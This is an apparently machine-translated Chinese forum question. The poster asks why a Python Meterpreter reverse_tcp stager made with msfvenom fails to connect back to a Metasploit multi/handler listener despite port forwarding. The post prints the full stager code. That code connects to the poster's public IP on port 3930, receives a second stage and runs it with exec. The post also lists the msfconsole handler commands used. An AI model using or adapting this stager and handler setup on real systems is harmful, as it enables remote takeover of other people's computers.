0
我已經使用msfvenom
創建以下蟒蛇有效載荷:Meterpreter就會無法連接回 - Python的
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})
那麼我已經打開了msfconsole
,並做了以下內容:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
它開始反向TCP處理程序在192.168.0.186:3930上,並啓動負載處理程序。但是,當我在另一臺計算機上運行該腳本時,等待大約一分鐘後,有效負載會超時,並且msfconsole不會註冊任何內容。我有端口在路由器上轉發3930。我在這裏做錯了什麼?